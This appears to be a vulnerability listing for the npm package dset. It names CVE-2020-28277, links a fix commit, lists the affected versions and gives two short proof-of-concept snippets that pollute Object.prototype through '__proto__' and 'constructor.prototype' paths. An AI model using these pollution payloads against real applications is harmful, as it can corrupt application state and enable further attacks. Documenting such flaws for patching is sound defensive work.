A tiny (196B) utility for safely writing deep Object values~!
Latest version: 3.1.0
| CVE | Fix |
|---|---|
| CVE-2020-28277 | https://github.com/lukeed/dset/commit/a4b8a935031b216a34c432ba9283b17ac32a68c6 |
let dset = require('dset');
if (dset.dset) dset = dset.dset;
dset({}, '__proto__.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 1.0.0 1.0.1 2.0.0 2.0.1
let dset = require('dset');
if (dset.dset) dset = dset.dset;
dset({}, 'constructor.prototype.a', 'b');
if (({}).a === 'b') console.log('exploitable');Vulnerable versions: 1.0.0 1.0.1 2.0.0 2.0.1